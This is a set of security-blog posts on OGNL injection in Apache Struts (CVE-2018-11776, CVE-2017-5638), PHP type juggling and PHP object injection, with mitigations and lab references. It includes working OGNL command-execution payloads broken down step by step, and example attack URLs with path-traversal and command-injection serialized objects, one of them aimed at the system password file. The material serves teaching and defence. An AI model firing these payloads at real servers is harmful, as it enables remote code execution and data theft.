#_memberAccess.excludedClasses=#_memberAccess.acceptPropertiesThis payload snippet is used for setting the restricted class name to blank.
#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptPropertiesThis payload snippet is used for setting the restricted package name to empty.
#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter()This payload snippet returns the HttpServletResponse instance and displays it.
#a=@java.lang.Runtime@getRuntime()This payload snippet returns the runtime object associated with the current application.
#s=new java.util.Scanner(#a.exec(‘hostname’).getInputStream()).useDelimiter(‘\\A’)This payload snippet is used for executing the command.
#str=#s.hasNext()?#s.next():”This payload snippet is used for displaying the next string based on its subscript if it is present.
#res.print(#str)This payload snippet is used for obtaining the output of the executed command.
#res.close()This payload snippet is used for sending all data to the user.

The Apache Software Foundation addressed this vulnerability by releasing a new patch and an advisory urging developers to upgrade struts to the most recent version and avoid using raw expression language in line with the majority of Struts tags.

Apache Struts 2 Namespace Redirect OGNL Injection (CVE-2018-11776)

A critical unauthenticated OGNL remote code execution vulnerability (CVE-2018-11776) in the Apache Struts web application framework was discovered due to improper handling of invalidated data on the URL passed to the Struts framework, which could allow remote attackers to run malicious OGNL expressions on the affected servers to execute system commands.

Understanding this issue as a developer necessitates a thorough understanding of not only the Struts code but also the numerous libraries used by the Struts framework. Understanding the fundamental cause of the issue was a big challenge for a developer in general due to a lack of sufficient definitions and documentation on the in-depth working of certain aspects. Furthermore, it was observed that this issue is commonly caused when a vendor releases a patch that causes a few behavioural changes in previously existing code, and it becomes extremely difficult and impractical for the developer to constantly track the background working of the code after every single patch is rolled out by the vendor.

Following a thorough root cause analysis of this vulnerability, it was discovered that it is not exploitable in default Struts configurations. When the ‘alwaysSelectFullNamespace’ option in the Struts 2 configuration file is enabled, and the ‘ACTION’ tag e.g., ‘<action ..>’ is specified without a namespace attribute or a wildcard namespace i.e., ‘/*’, the OGNL expressions sent through specially crafted HTTP requests are evaluated and can be used to perform an unauthenticated remote code execution attack, which can lead to a complete compromise of the targeted system.

Background:

This vulnerability operated in three stages:

  1. In the Struts 2 configuration file, the 'alwaysSelectFullNamespace' option was set to ‘true’, and the 'ACTION' tag was supplied without a namespace attribute or a wildcard namespace.
  2. Through a specially constructed OGNL expression in the request, a malicious OGNL expression was inserted in the URL in the common web directories.
  3. Due to the lack of robust improper handling, the malicious OGNL expression was interpreted, resulting in the execution of the injected malicious OGNL expression.

Detection and Exploitation:

This vulnerability is detectable and exploitable using a variety of publicly accessible exploits and scripts, some of which are listed below:

Malicious Request:

Intended Response:

Unencrypted Payload:

Payload Breakdown:

Payload SnippetDescription
#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESSThis payload snippet declares a variable and assigns it DefaultMemberAccess permission.
#_memberAccess?(#_memberAccess=#dm)This payload snippet is used for checking the presence of the '_memberAccess' class. If the class is found, it is replaced by the 'DefaultMemberAccess' defined in the previously declared ‘dm’ variable.
#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]This payload snippet is used for obtaining the container.
#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)This payload snippet uses the container obtained in the previous step for getting the object of the OgnlUtil class.
#ognlUtil.getExcludedPackageNames().clear()This payload snippet is used for clearing the excluded package names.
#ognlUtil.getExcludedClasses().clear()This payload snippet is used for clearing the excluded classes.
#context.setMemberAccess(#dm)This payload snippet is used for setting the member access of the current context to 'DefaultMemberAccess'.
#cmd=’hostname’This payload snippet is used for executing the command.
#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))This payload snippet is for detecting if the operating system is windows.
#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})This payload snippet is used for executing the command depending on the operating system used by the target application.
#p=new java.lang.ProcessBuilder(#cmds)This payload snippet is used for executing the command by utilizing the ProcessBuilder class.
#p.redirectErrorStream(true)This payload snippet is used for enabling verbose error messages.
#process=#p.start()This payload snippet is used for executing the command.
#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())This payload snippet is used for obtaining the output and sending the obtained output to the user.
@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)This payload snippet is used for obtaining the output of the executed command.
#ros.flush()This payload snippet is used for performing flush and sending all data to the user.

The Apache Software Foundation issued a patch to address this vulnerability. A proof-of-concept exploit of the vulnerability was posted on GitHub shortly after the Apache Software Foundation released its patch.

Apache Struts Jakarta Multipart Parser Improper OGNL Evaluation Vulnerability (CVE-2017-5638)

CVE-2017-5638, an OGNL injection vulnerability, was discovered in the Jakarta Multipart parser in Apache Struts 2. This vulnerability is commonly referred to as the Equifax breach. The vulnerability was caused due to the lack of effective exception handling and the generation of verbose error messages during file uploads. This misconfiguration assisted remote unauthenticated adversaries in executing arbitrary commands. The malicious payloads used to achieve command injection were transmitted via the HTTP headers Content-Type, Content-Disposition, and Content-Length.

This flaw was exploited by simply injecting the '#cmd=' string, which contained the payload to be executed. Furthermore, this vulnerability was graded a low attack complexity, implying that an adversary may implement this attack and compromise the target application with ease.

Background:

This vulnerability worked in two steps:

  1. The malicious OGNL expression was injected via the Content-Type/Content-Disposition/Content-Length HTTP header, which when parsed by the Jakarta Multipart parser resulted in an exception and the creation of verbose error messages that were visible to the end users.
  2. The exception was subsequently forwarded to the error handling function, which interpreted it, resulting in the execution of the injected malicious OGNL expression.

Detection and Exploitation:

This vulnerability is detectable and exploitable using a variety of publicly accessible exploits and scripts, some of which are listed below:

Malicious Request:

Intended Response:

Payload Breakdown:

Payload SnippetDescription
#_=’multipart/form-data’This payload snippet describes a variable that indicates the content type of the request is multipart form.
#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESSThis payload snippet declares a variable and assigns it DefaultMemberAccess permission.
#_memberAccess?(#_memberAccess=#dm)This payload snippet is used for checking the presence of the '_memberAccess' class. If the class is found, it is replaced by the 'DefaultMemberAccess' defined in the previously declared 'dm' variable.
#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]This payload snippet is used for obtaining the container.
#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)This payload snippet uses the container obtained in the previous step for getting the object of the OgnlUtil class.
#ognlUtil.getExcludedPackageNames().clear()This payload snippet is used for clearing the excluded package names.
#ognlUtil.getExcludedClasses().clear()This payload snippet is used for clearing the excluded classes.
#context.setMemberAccess(#dm)This payload snippet is used for setting the member access of the current context to 'DefaultMemberAccess'.
#cmd=’hostname’This payload snippet is used for executing the command.
#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))This payload snippet is for detecting if the operating system is windows.
#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})This payload snippet is used for executing the command depending on the operating system used by the target application.
#p=new java.lang.ProcessBuilder(#cmds)This payload snippet is used for executing the command by utilizing the ProcessBuilder class.
#p.redirectErrorStream(true)This payload snippet is used for enabling verbose error messages.
#process=#p.start()This payload snippet is used for executing the command.
#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())This payload snippet is used for obtaining the output and sending the obtained output to the user.
@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)This payload snippet is used for obtaining the output of the executed command.
#ros.flush()This payload snippet is used for performing flush and sending all data to the user.

Analysis of the updated code that contained the patch for this vulnerability revealed that the ‘LocalizedTextUtil‘ class [line 6 in the below-mentioned code snippet], along with the ‘java.io.File‘ which was responsible for improperly handling the verbose error messages and eventually leading to code execution, was removed from the Jakarta-based file upload Multipart parser.

The following code snippet displays the officially patched code by the vendor:

Practice Labs

We at The SecOps Group strongly believe in a hands-on approach towards cyber security, and therefore have published an OGNL Injection lab on our platform Vulnmachines for you to learn more about the infamous OGNL Injection vulnerability by practicing its detection and exploitation in a real-world like simulation.

The practice lab relevant to the OGNL Injection vulnerability is listed below and can be accessed by navigating to Vulnmachines:

Mitigation and Best Practices

  • Implement strong input validation and output encoding on both the client and server sides, and the methods used to evaluate OGNL expressions should only be used in static configurations and JSP; they should not receive invalidated user input directly.
  • Developers must avoid integrating the end-user input into iteratively evaluated code. There are safer methods for achieving a similar result using other functionalities that cannot be coerced by an attacker for injecting malicious OGNL expressions.
  • Always use the most recent version of all underlying software, as well as a properly configured web application firewall.
  • Block OGNL Expressions initiation in Apache Struts HTTP Request.

References and Further Reading

PHP Type Juggling Simplified

Greetings to all. In this blog post, our Principal Consultant Rohit Misuriya has talked about the PHP Type Juggling vulnerability. The per-requisites, attack vectors, exploitation scenarios, recommendations, practice labs, and more information about the issue has been provided by him in this blog.

Since its introduction, PHP has maintained a prominent level of popularity, and statistics suggest that many web application developers favour it. This is one of the reasons why the information security community has been intrigued about PHP for so long. The use of PHP in numerous Content Management Systems (CMS), the source codes for which are freely available on websites like GitHub, is another factor contributing to PHP’s fame in the realm of information security. Due to the open-source nature of these source codes, various vulnerabilities that are unique to programmers and systems that use PHP as their primary programming language, have been identified.

There have been a lot of vulnerabilities in PHP-based apps, both in terms of quantity and variety. However, most security experts and developers overlook or disregard them as  not all disclosed vulnerabilities are easy to comprehend and identify. In this blog post, we will talk about PHP Type Juggling (Loose Comparison), one such vulnerability that belongs to this category, so that the readers have a better knowledge of this mysterious vulnerability as to why it exists, and how an attacker may exploit it etc. Furthermore, we have built a practice lab on our platform Vulnmachines for you to explore and get direct experience of this vulnerability.

TL;DR

  1. PHP type juggling vulnerability occurs when a loose comparison operator (== or!=) is used in the place of a strict comparison operator (=== or!==) in a situation where the attacker has access to one of the variables being compared. 
  2. This vulnerability may cause the application to provide an unexpected true or false response and may result in serious authorization and/or authentication problems. 
  3. For the convenience of developers, loose comparisons provide a set of operand conversion rules.
  4. For direct practice, Vulnmachines provides an intentionally vulnerable testing playground.

PHP comparison methods

The term “type juggling” or “type casting” refers to a PHP functionality. This indicates that PHP will first transform variables of disparate kinds to a common, comparable type before comparing them.

For instance, in the following example, the program compares the string “4” and the integer 4:

The program will execute flawlessly and print “PHP can evaluate strings and integers.” This behavior is especially useful if we want our application to adapt to different user input types. However, it is important to note that this behavior is also a significant source of security flaws and bugs.

For example, PHP will try to extract the integer from the string when comparing the string “9 phones” to the integer 9. This comparison will therefore yield a True result. (PHP-5)

This kind of loose type comparison behavior is rather typical in PHP, and many built-in functions operate in a similar manner. Although it is clear this could be detrimental, how exactly can an attacker take advantage of this behavior?

What causes the vulnerability

This unique feature of PHP is frequently exploited to get around authentication restrictions.Suppose the PHP code for handling authentication is as follows (PHP-5):

Then, as this evaluates to True, entering an integer input of 0 would successfully log you in (PHP-5):

PHP Comparisons: Strict
PHP Comparisons: Loose
Magic Hashes

If the computed hash only contains numbers after the first “0e” (or “0..0e”), PHP will treat the hash as a float. A password hash that begins with “0e” will always appear to match the below strings, regardless of what they actually are. The consequence is that when these magic hash numbers are compared to other hashes and treated as the number “0,” the comparison will result in a True. Consider the scientific notation “0e…” as standing for “0 to the power of some value,” which is always “0.” The string is interpreted by PHP as an integer.

Example:

Scenarios of Exploitation

This vulnerability, though, is not always exploitable, frequently requires the use of a deserialization bug. This is due to the fact that POST, GET, and cookie values are typically supplied to programs as strings or arrays.

PHP would compare two strings if the program received the POST parameter from the previous example as a string, therefore no type conversion would be required. And it goes without saying that “0” and “password” are separate strings.

However, if the program accepts the input through functions like json_decode() or unserialize(), type juggling issues can be exploited. The end-user would be able to specify the kind of input that is passed in in this way.

Take a look at the JSON blobs above. The first would force PHP to understand the input as an integer, whereas the second would cause PHP to consider the id parameter as a string. As a result, the attacker will have a fine-grained control over the type of incoming data and can therefore take advantage of type juggling concerns.

Industry Standards and Recommendations

There are numerous actions you may take as a developer to stop these vulnerabilities from occurring.

Use Strict comparison

Always strive to use the type-safe comparison operator “===” rather than the loose comparison operator “==” when comparing values. The operation will only return True if the types of the two variables match, preventing PHP from engaging in type juggling. Therefore, the expression (4 === “4”) will return False.

Use “Strict” option for the comparison functions

Always read the PHP manual for specific functions to see if they employ type-safe or loose comparison. Check if using strict comparison is an option, then include that option in your code.

For instance, PHP’s in_array() by default employs loose comparison. But, if you specify the strict option, it will switch to type-safe comparison.

Always avoid using a function that uses loose comparison and look for alternatives.

But, if we specify the strict option, it will switch to type-safe comparison as shown below:

Do not use typecasting before comparison

It is best to avoid typecasting before comparing values because it will provide outcomes remarkably similar to type juggling. The type-safe operator, for instance, perceives the following three variables as different, that is before typecasting.

While “4 str” will change to the integer 4 after typecasting, PHP will only keep the number that was extracted from the string.

Practice Labs

As a team of advanced penetration testers and security researchers, we passionately believe in a hands-on approach to cyber security. As a result, we have published a PHP Type Juggling lab on our platform Vulnmachines. The readers can further understand this vulnerability and its exploitation by practicing it in our labs which resemble real-life situations.

Detection of the vulnerability

The option to download the source code is available in the lab, as seen in the screenshot below.

Forget Password

There is a function in the source code that creates a link for the user to reset their password which looks like this.

http://{domain}/Reset.php?user=admin&time=1671181751&sig=8d03edbc

Upon closer examination of the function in the source code, we discover that the application creates a random reset token and stores it in the database. It then generates a sha256 hash using the following 4 parameters:

  • User’s username
  • Random token from the database
  • Current time
  • User’s current password

 It then uses the first eight letters of the hash created above to create the password reset link.

Reset.php

As seen in the below mentioned screenshot, a function called “ValidateLink” checks the URL to reset the password before allowing the user to do so. To validate the link, the function obtains the random token and current password of the user from the database and uses the  username and time value from the URL to generate the hash which it then compares (first 8 characters) with the value supplied in the sig parameter of the URL.

Reset.php

However, as we can see the developer of that function used a loose comparison to compare the two hashes. So, let’s see if we can exploit it. 🙂

Exploitation

We can see that there are actually four parameters used to create the hash, but only the user and time parameters are under the attacker’s control. Since the user parameter is static and the function retrieves the password and token from the database based on the username, the only parameter an attacker can use to exploit the vulnerability is time.

Let’s assume that the username is “admin,” the random token is “56532800904”, the value of time is “1671181751”, and the password is “Admin@123” to better comprehend the procedure. The sha256 hash of these values in this instance will be:

8d03edbc280414b9c6a82658a866087fdd945f8d72b293c321763b8ce5dadb69

Hash Generation

The link to reset the password will appear as follows because the developer only used the first 8 letters of the hashed value to create it:

http://{domain}/Reset.php?user=admin&time=1671181751&sig=8d03edbc

As we’ve already seen, the developer is validating the link to reset your password by using a loose comparison. Therefore, if we are able to pass the time value in such a way that the “generateSig” function creates a magic hash that begins with 0e followed by numbers, then we can bypass the loose comparison. To do so, in the link of reset the password, we need pass the hash 0e000000 so that PHP will try to convert both strings to integers before comparing them, as shown in the screenshot below, leading to a type juggling issue:

Let’s create some hashes with 3 variables fixed (username, token and current password) but with different values of time.

We can see that in this case, if we utilize the time value of 1671194321, we can bypass the comparison as displayed below as the resulting hash starts with 0e followed by numbers (first 8 characters):

Now, since we are unaware of the user’s token and actual password, we must apply brute force to get the perfect value of time until we find the ideal link. As we have no control over server-side code, the next concern is how can we know if the link is perfect?

Since we already know that the response length will change when the link is perfect, we can utilize this situation in our attack to get the perfect link.

Exploit Writing

As shown below, we must first develop a code to determine the response length of a broken password reset link.

Length.py
Length of the Response

Now that we are aware that the non-working link’s response length is 1143, we can use it to find the right link. To brute force, we must design an exploit that uses a loop to send the various requests to the server with an increasing value of time until the response length changes.

Exploit.py
Password Reset Link
Flag

And it works! We have got the perfect password reset link. Readers can find the exploit here.

Note: We advise validating the correct response length before using the main exploit and updating the exploit as necessary because the length in the exploit may change depending on the response length the user receives. Also we need to keep in mind that there is a restriction on time parameter, the same value of time parameter will not be valid after 6 hours as mentioned in the “tokenExpiry” function.

Conclusion

PHP is a fantastic language that is adaptable, practical, and simple to learn. However, this adaptability has a price. If the developer is careless, several PHP features might result in vulnerabilities.

One aspect that has the potential to lead to vulnerabilities is Type Juggling. Be particularly cautious when comparing values, and always be aware of how your application is operating.

References

Demystifying PHP Object Injection

Hello readers, in this blog post, our consultant Aditya has discussed the PHP Object Injection vulnerability. He explains the vulnerability details, minimum requirements, vulnerability techniques, vulnerability chaining with other vulnerabilities, recommendations, practice labs, and much more.

PHP’s popularity has been consistent since its beginning, and statistics show that it is a preferred language for many web application developers. This is one of the reasons why PHP has long piqued the curiosity of the information security community. Another reason PHP is well-known in the information security field is because of its use in various Content Management Systems (CMS), the source codes for which are publicly available on platforms such as GitHub. Since the source codes are open source in nature, several vulnerabilities have been uncovered that are particular to applications and systems that use PHP as their preferred language.

The variety and number of vulnerabilities discovered in PHP-based applications are significant. However, not all of the discovered vulnerabilities are easy to comprehend and detect, and hence the majority of security professionals and developers overlook or ignore those vulnerabilities. PHP Object Injection is one such vulnerability that falls into this category, which we will discuss in this blog so that the reader has a better understanding of this obscure vulnerability, why it exists, and how an attacker might exploit it. In addition, we have created a compilation of four practice labs on our platform Vulnmachines where you may navigate and gain hands-on experience with various real-life scenarios.

TL;DR

  1. PHP Object Injection occurs as a result of the deserialization of data from insecure sources, such as user-supplied input, and the absence of integrity verification measures.
  2. PHP Object Injection makes use of magic methods, which are predefined PHP methods that help in the exploitation of this vulnerability.
  3. Several vulnerabilities such as Command Injection, Path Traversal, Authentication Bypass, and others can be chained with PHP Object Injection to enhance the impact.
  4. An intentionally vulnerable testing playground is available on Vulnmachines for hands-on practice.

Serialization and the serialize() method

Serialization is the process of transforming an object into a value representation to store it in a memory buffer or transfer it to a database, via a network, or to a file. When serialization is performed it is ensured that the state of the object is also maintained, which implies that the properties of the object, as well as their allocated values, are retained. The primary goal of serialization is to store an object’s state, so that it may be recreated when needed.

The ‘serialize()’ method in PHP accepts a single parameter which is the data we want to serialize and converts it into a storable representation of value that can be returned by the method as a serialized string. Other than resource-type data, such as references to external resources and certain objects, the ‘serialize()’ method can handle all types of values. 

The table below outlines the basic structure of a PHP serialized string, which will assist in understanding the serialized strings explained in the subsequent code samples throughout the log post.

Annotation

Description

O:4

Represents an object with the length of class name as 4

s:4:”test”

Represents the parameter name as a string of 4 characters i.e., “test”

a:2

Represents an array of 2 elements

i:2

Represents an element at index two

b:1

Represents a Boolean

d:1.1

Represents a Float

The following table summarizes the technical details associated with the serialize() method:

Syntax

serialize(value)

Parameter Value

Mandatory

Return Type

String

Return Value

A String of byte-stream representation of the specified parameter value, which could be stored anywhere.

Example:

The preceding code snippet creates a ‘SerializationExample’ class object and then generates the serialized string representation of that object:

O:20:”SerializationExample”:1:{s:4:”data”;a:3:{i:0;s:3:”The”;i:1;s:6:”SecOps”;i:2;s:5:”Group”;}}

A better understanding of the above-serialized string representation of the object can be obtained from the below table:

Annotation

Description

O:20

Represents an object with the length of class name as 20

s:4:”data”

Represents the parameter name as a string of 4 characters i.e., “data”

a:3

Represents an array of 3 elements

i:0

Represents an element at index zero

Deserialization and the unserialize() method

Deserialization is the process of reassembling an object or data structure from a single serialized variable into a PHP value.

When a serialized string containing an object and its properties is passed to the ‘unserialize()’ method, the ‘unserialize()’ method will perform Object Instantiation, which is the process of recreating an instance of the provided initially serialized object in memory. Once the object has been recreated in memory, PHP will attempt to invoke the ‘__wakeup()’ magic method and execute the code in the ‘__wakeup()’ method; if a ‘__wakeup()’ method exists, the code will be performed in the existing method.

The ‘__wakeup()’ magic method can recreate any properties that the original object has had. The ‘__wakeup()’ magic method is meant to be used to restore any database connections that may have been lost during serialization and to execute additional reinitialization operations. When no reference to the deserialized object instance exists, the ‘__destruct()’ magic method of that class is invoked.

Example:

The preceding code snippet recreates the ‘SerializationExample’ class object from the serialized string representation of that object.

The following table summarizes the technical details associated with the ‘unserialize()’ method:

Syntax

unserialize(string, options)

Parameter String

Mandatory (Serialized String)

Parameter options

Optional (Could be an array of class names, false for no classes and true for all classes)

Return Type

String, Boolean, Array, Float, Integer, or Object

Return Value

The unserialized value

What is PHP Object Injection?

When the user-supplied input is not properly validated and sanitized before being sent to the ‘unserialize()’ PHP function, PHP Object Injection occurs. Since PHP supports object serialization, attackers could supply arbitrary serialized strings to a susceptible ‘unserialize()’ method, resulting in the injection of arbitrary PHP object(s) into the application. PHP Object Injection allows for the unrestricted alteration of object content, which must be unserialized using the PHP ‘unserialize()’ function.

Prerequisites

The following prerequisites must be satisfied in order to properly exploit a PHP Object Injection vulnerability:

  • On the injection points, the application must not have a comprehensive input validation mechanism.

  • The application must not validate the serialized data’s integrity and must enable deserializing data from untrusted sources.

  • A class that implements at least one PHP magic method must be present in the vulnerable application (In the parts that follow, there will be further information about these).

  • All of the classes used during the attack must be declared when the vulnerable ‘unserialize()’ is being called, otherwise object autoloading must be supported for such classes.

Impact

The impact of PHP Object Injection depends largely on the context where it is discovered; however, it enables an attacker to execute a variety of malicious attacks, including but not limited to Code Injection, SQL Injection, Path Traversal, and Application Denial of Service, among others.

Since we now understand what PHP Object Injection is and what prerequisites must be satisfied for it to exist, and what impact it has, let us now look at the showstopper, i.e., the magic methods, which play a critical part in the existence of this exotic vulnerability.

Magic Methods

PHP magic methods are methods that are automatically invoked when specific criteria are satisfied. As they are predefined methods, one cannot have functions with these names in any of the classes unless users desire the accompanying magic functionality. A magic method is easily distinguished from conventional methods since it begins with a double underscore in PHP.

PHP includes 15 magic methods that can lead to PHP Object Injection, all of which are listed in the table below:

Magic Method

Details

__call()

When a non-existing or inaccessible method is called by an object, PHP will automatically invoke the ‘__call()’ magic method using the name of the method you requested to call and the argument you provided as parameters.

The below-mentioned code snippet utilizes the ‘getAnyRandomData’ method, which is not declared anywhere in the above code snippet, and therefore the ‘__call()’ magic method is invoked.

__callStatic()

When an inaccessible static method of a class is called by an object, PHP will automatically invoke the ‘__callStatic()’ method.

The below-mentioned code snippet utilizes the ‘getAnyRandomData’ static method, which is not declared anywhere in the above code snippet, and therefore the ‘__callStatic()’ magic method is invoked.

__clone()

When an object is cloned in PHP with the clone keyword, the ‘__clone()’ magic method is invoked. After the object has been cloned, the ‘__clone()’ magic method is used to manipulate the object’s state.

The below-mentioned code snippet utilizes the ‘clone’ keyword as a result of which PHP invokes the ‘__clone()’ magic method.

__construct()

Due to the fact that it is used to configure a class when it is initialized, PHP’s ‘__construct()’ method is the most frequently used magic method. Classes with a constructor method utilize this method on newly formed objects, making it ideal for any initialization that the object may require before it is utilized. Classes with a ‘constructor’ method utilize this method on newly formed objects, making it ideal for any initialization that the object may require before it is utilized.

The below-mentioned code snippet utilizes the ‘__construct()’ magic method which is invoked by PHP when the object of the ‘constructMagicMethod’ class is created.

__debugInfo()

The ‘__debugInfo()’ magic method is executed when an object is utilized inside the ‘var_dump()’ method to dump information for debugging purposes. The ‘__debugInfo()’ magic returns an array of variables that might be helpful while performing debugging.

The below-mentioned code snippet utilizes the ‘__debugInfo()’ magic method which is invoked by PHP when the object of the ‘debugInfoMagicMethod’ class is used inside the ‘var_dump()’ method as a parameter.

__destruct()

PHP automatically invokes the ‘__destruct()’ magic method when the object is destroyed at the end of the program and no longer serves usage.

The below-mentioned code snippet utilizes the ‘__destruct()’ magic method which is automatically invoked by PHP when the object of the ‘destructMagicMethod’ class is destroyed at the end of the program and no longer serves usage.

__get()

The ‘__get()’ magic method is invoked when an inaccessible private or protected variable, or a variable that does not exist, is used.

The below-mentioned code snippet utilizes the ‘__get()’ magic method inside the ‘getMagicMethod’ class which is invoked by PHP when a non-existing variable is used.

__invoke()

When an object is treated as a function, the ‘__invoke()’ magic method is called. The major function of the ‘__invoke()’ method is that you may implement it if you wish to represent your objects as callable.

The below-mentioned code snippet utilizes the ‘__invoke()’ magic method which is called automatically by PHP when the object of the ‘invokeMagicMethod’ class is treated as a function.

__isset()

The ‘__isset()’ magic method is triggered when a call is made to the ‘empty()’ or ‘isset()’ method on an inaccessible or non-existent object property.

The below-mentioned code snippet uses the ‘isset()’ function on the Test property, which is absent from the ‘issetMagicMethod’ class, and thus the ‘__isset()’ magic method is triggered.

__set()

When an inaccessible variable, such as a private or public variable, or a non-existent variable, is edited or altered, PHP automatically invokes the ‘__set()’ magic method.

The below-mentioned code snippet utilizes the ‘__set()’ magic method inside the ‘setMagicMethod’ class which is invoked automatically by PHP when a non-existing variable i.e., ‘$absentVariable’ is used or altered.

__set_state()

The ‘__set_state()’ magic method is a static method that works with the ‘var_export()’ function. When using this magic method to export classes, the ‘var_export()’ function must be specified in the class.

In the below-mentioned code snippet PHP automatically invokes the ‘__set_state()’ magic method when the object of the ‘setstateMagicMethod’ class is passed to the ‘var_export()’ function.

__sleep()

The ‘__sleep()’ magic method is triggered when the ‘serialize()’ function is invoked on an object. Specific properties are saved during serialization under certain cases, and the ‘__sleep()’ magic method returns an array containing the names of properties that must be serialized.

The below-mentioned code snippet utilizes the ‘__sleep()’ magic method which will be invoked when the object of the ‘sleepMagicMethod’ class will be passed to the ‘serialize()’ function and only the properties i.e., ‘firstName’, ‘middleName’, and ‘lastName’ will be preserved.

__toString()

When an object is represented or processed as a string, PHP automatically invokes the ‘__toString()’ magic method. Essentially, this magic method assists in expressing what must be showcased when the object is processed as a string. If the ‘__toString()’ magic method is not available and the class object is used by ‘print’ or ‘echo’, an error message will be displayed.

The below-mentioned code snippet utilizes the ‘__toString()’ magic method, which is invoked automatically by PHP when the object of the ‘toStringMagicMethod’ is passed to ‘echo’ and therefore treated as a string.

__unset()

PHP invokes the ‘__unset()’ magic method when an ‘unset()’ function is used on an inaccessible private, protected, or non-existent object property.

The code snippet below invokes the ‘unset()’ function on the ‘Test’ property, triggering the ‘__unset()’ magic method, which restores the ‘Test’ property’s original state.

__wakeup()

When the ‘unserialize()’ function is invoked on the object, the ‘__wakeup()’ magic method is intended to re-establish any connections that may have been lost during serialization and perform other reinitialization tasks.

The code snippet below utilizes the ‘connectionmethod()’ function, which is used by the ‘__wakeup()’ magic method, to re-establish the connection when the ‘unserialize()’ function is implemented to the ‘wakeupMagicMethod’ class object.

PHP Object Injection Samples

As we understand what PHP Object Injection is and how insecure deserialization and magic methods in PHP are the underlying cause, let us look at some vulnerable PHP Object Injection samples to get an understanding of what PHP Object Injection can lead to.

Authentication Bypass via Object Reference

The following example demonstrates the PHP class ‘POI2IDOR’ with an exploitable ‘unserialize()’ method. In line 9 of the code snippet below, we observe that the data from the ‘inputparameter’ is deserialized in an unsecured way, which is then given to an ‘if’ conditional statement on line 12 that is subject to Type Juggling. When a specifically designed serialized object is supplied in this example, an attacker might be able to obtain an object reference for accomplishing an authentication bypass, for example, by accessing the following URL: ‘http://vulnerable.target.com/test.php?inputparameter=a:2:{s:15:”adminsecretcode”;N;s:4:”misc”;R:2;}’

Vulnerable Code Snippet:

Path Traversal

The below-mentioned example demonstrates a PHP class ‘POI2PT’ with an exploitable ‘__destruct()’ magic method spanning from line 5 to line 10. When a specifically constructed serialized object is supplied in this example, an attacker might be able to perform Path Traversal, by browsing the following URL: ‘http://vulnerable.target.com/test.php?inputparameter=O:6:”POI2PT”:1:{s:12:”existingfile”;s:22:”../../../../etcpasswd”;} ‘

Vulnerable Code Snippet:

Authentication Bypass via Type juggling

The following example demonstrates an exploitable unserialize method. When a specifically constructed serialized object is supplied using a POST request, an attacker will be able to perform an authentication bypass with the help of type juggling as the comparison statement on line 5 appears to be loosely comparing the data. The HTTP request for exploiting this misconfiguration will be similar to the one mentioned below:

Vulnerable Code Snippet:

POST Request:

Arbitrary Code Injection

As seen in the following example, the PHP class ‘POI2CI’ includes an exploitable ‘__destruct()’ magic method from line 7 to line 9. When a precisely configured serialized object is supplied in this code snippet, the application will seek references to the ‘receivedinput’ object, and once there are no more references, the ‘__destruct()’ magic method will be called, resulting in the execution of the injected command.

The attacker will be able to obtain command injection, by accessing the following URL: ‘http://vulnerable.target.com/test.php? inputparameter=O:6:”POI2CI”:1:{s:16:”arbitrarycommand”;s:2:”id”;}’

Vulnerable Code Snippet:

PHPGGC: PHP Generic Gadget Chains

PHPGGC is a deserialization payload library that includes a tool for generating them from the command line or programmatically. This may be used to produce Property Oriented Programming (POP) gadgets from libraries that users have already discovered. While facing unserialize on a website for which you do not have the source code, or simply when attempting to develop an attack, this tool allows you to produce the payload without having to go through the time-consuming procedures of locating and assembling gadgets.

CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, WordPress, Yii, and ZendFramework are all supported by PHPGGC. Additionally, PHPGGC requires a PHP version greater than or equivalent to 5.6 for proper functioning.

The attributes associated with a gadget chain generated by the PHPGGC library are described in the table below:

Attribute

Description

Name

Name attribute specifies the framework or library that the gadgets are intended for.

Version

Version attribute specifies the framework or library version for which the gadgets are intended.

Type

Type attribute describes the sort of exploitation the gadget chain would result in, such as Remote Code Execution, Arbitrary File Deletion, Server-Side Request Forgery, and so on.

Vector

Vector attribute describes the PHP magic method that will be used to initiate the chain following the unserialize operation on the specified input.

Information

Information attribute describes any extra detail associated with the gadget chain.

At the time of writing, the PHPGGC library has 94 gadget chains associated with various frameworks and libraries that it could exploit. The list of available gadget chains in PHPGGC can be obtained by executing the below-mentioned command:

Depending on the application technology, we can also use the following command to filter the gadget chain available in the PHPGGC that is most suited for testing:

PHPGGC provides a ‘-i’ flag that can be used to retrieve additional information about the specified gadget chain using the command below:

On a high level, PHP Object Injection Exploitation Using PHPGGC includes the following activities:

  1. Detection of the framework or library in use.

  2. Identification of a possible injection point, such as a parameter, cookie, or Header.

  3. Additional attack preparation, such as a reverse shell or a backdoor, which will be uploaded to the application server upon successful exploitation of the vulnerability.

  4. Custom serialized object creation using PHPGGC

Interesting Real World Scenarios

Over time, security experts worldwide have discovered several instances of PHP Object Injection vulnerability, some of which could be exploited to achieve Remote Code Execution, Authentication Bypass, etc. Some of the most significant cases of the PHP Object Injection vulnerability are described below, which will aid in acquiring a better understanding of this vulnerability and knowing some of the finest publicly known exploits.

Data Tampering through PHP Object Injection

WooCommerce is a WordPress e-commerce plugin. It simplifies the process of developing and administering an online store by providing decent levels of flexibility as well as various important features such as inventory and tax administration, secure payments, and shipping integration.

In this case, the security researcher was testing the order feature in the WooCommerce WordPress plugin and discovered that the PHP native unserialize method allows small ‘o’ as an option and treats it as a ‘StdClass’ object.

Vulnerable Code Snippet:

